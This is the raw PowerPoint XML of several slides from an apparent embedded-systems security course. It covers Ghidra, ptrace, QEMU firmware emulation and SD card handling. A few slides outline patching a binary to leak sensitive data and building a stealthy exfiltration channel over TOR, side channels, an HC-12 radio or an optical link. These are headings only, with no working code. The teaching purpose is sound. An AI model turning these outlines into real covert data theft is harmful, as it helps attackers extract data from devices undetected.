                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> as well as a detailed exercise.  The exercise is here.  Both of these sections were written by Troy Shurtleff of BAE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Get Ghidra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There’s an additional online tutorial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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA684D1E-A5D3-FF4D-B63D-6A5190CAB16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38870938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Ghidra Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182880" y="1540434"/>
            <a:ext cx="1182624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Find a elf binary and drag it into the project folder.</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Ghidra gives some file information automatically.</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Double click on the file to get the code browser.</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Look for a function you want Ghidra to decompile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Patch the program to get it to spit out sensitive data and run it under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Ghidra doesn’t have an embedded emulator/debugger so we use ptrace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process (the "trace"), and examine and change the tracee's memory and registers. It is primarily used to implement breakpoint debugging and system call tracing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;sys/ptrace.h&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>long ptrace(enum __ptrace_request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, pid_t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, void *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, void *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</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For a tutorial on ptrace, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA684D1E-A5D3-FF4D-B63D-6A5190CAB16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39439469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Exfiltrate data to known IP/port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1852049"/>
            <a:ext cx="11582400"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Troy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5722B496-E363-B749-B7D4-B0D921F4B729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32570058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80" y="354868"/>
            <a:ext cx="11823140" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Build a nonstandard data exfiltration port</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x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3122AEA3-9763-894B-A82F-2EAACE634368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324100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23" y="0"/>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Make the exfiltration port stealthy</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Use TOR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Use side channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>HC-12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Optical link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23836E67-33CE-9D4E-9B32-9AAE23CF5546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13817311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623993"/>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6,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other IoT platforms </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5E5C8D0-9823-F84B-95DF-8346A5CA5109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77686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14" y="113983"/>
            <a:ext cx="10955008" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software processes and formats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456216" y="2058036"/>
            <a:ext cx="11224506" cy="4134946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Firmware Emulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Kernel image with a superset of kernel modules</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QEMU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Software debugger (e.g. GNU stub or ARM Angel Debug monitor)</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OS debug capabilities (e.g. KDB/KGDB)</a:t>
            </a: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B567ED-85FD-D248-BC00-F515307D6A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31337792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64" y="0"/>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Reading and writing SD cards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="1692910"/>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You need a peripheral like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UGREEN SD Card Reader USB 3.0 Dual Slot Flash Memory Card Reader TF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or notebook with integrated SD card.</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your SD card is already formatted</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"fdisk -l" to list the disks that are accessible to the computer.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mkdir /mnt/SD</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mount -t vfat /dev/sdc1 /mnt/SD</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cd /mnt/SD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="base">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To partition and format the SD card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l" fontAlgn="base">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parted /dev/sdb</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umount /dev/sdc1</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parted /dev/sdc rm 1</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mkfs.vfat -F32 -v /path/to/sd/card</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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A87B3119-CA93-F84F-9F3A-944B0B9E3817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4070219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08" y="37042"/>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Look at an existing SD cards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296032" y="1289156"/>
            <a:ext cx="11582400" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-28575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Raspberry Pi file system read on SD card</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err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jlm@Hilbert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/media/jlm$ ls -l</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total 20</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drwxr-xr-x 22 root root  4096 Jun 19  2013 0eb36e9e-40f5-47f4-a751-4e197c0dd7c8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drwxr-xr-x  2 jlm  jlm  16384 Dec 31  1969 boot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/media/jlm/boot$ ls -l</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total 18888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17808 Jun 19  2013 bootcode.bin</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142 Dec 31  1979 cmdline.txt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1180 Jun 19  2013 config.txt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2024 Jun 19  2013 fixup_cd.dat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5882 Jun 19  2013 fixup.dat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8832 Jun 19  2013 fixup_x.dat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137 Jun 19  2013 issue.txt</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9610248 Jun 19  2013 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kernel_emergency.img</a:t>
            </a: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2803520 Jun 19  2013 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kernel.img</a:t>
            </a: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468536 Jun 19  2013 start_cd.elf</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2689268 Jun 19  2013 start.elf</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-rw-r--r-- 1 jlm jlm 3656516 Jun 19  2013 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_x.elf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"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A87B3119-CA93-F84F-9F3A-944B0B9E3817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15662561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08" y="0"/>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Look at an existing SD cards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296032" y="1280636"/>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Continued</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jlm@Hilbert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/media/jlm/0eb36e9e-40f5-47f4-a751-4e197c0dd7c8$ ls -l</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total 92</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19  2013 bin</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19  2013 boot</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3 root root  4096 Jun 19  2013 dev</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96 root root  4096 Jun 19  2013 etc</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3 root root  4096 Jun 19  2013 home</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12 root root  4096 Jun 19  2013 lib</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  2 root root 16384 Jun 19  2013 lost+found</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19  2013 media</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15  2013 mnt</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3 root root  4096 Jun 19  2013 opt</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15  2013 proc</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  2 root root  4096 Jun 19  2013 root</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8 root root  4096 Dec 31  1969 run</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19  2013 sbin</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20  2012 selinux</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Jun 19  2013 srv</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2 root root  4096 Feb 25  2013 sys</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drwxrwxrwt  4 root root  4096 Jun 19  2013 tmp</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10 root root  4096 Jun 19  2013 usr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>drwxr-xr-x 11 root root  4096 Jun 19  2013 var</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A87B3119-CA93-F84F-9F3A-944B0B9E3817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
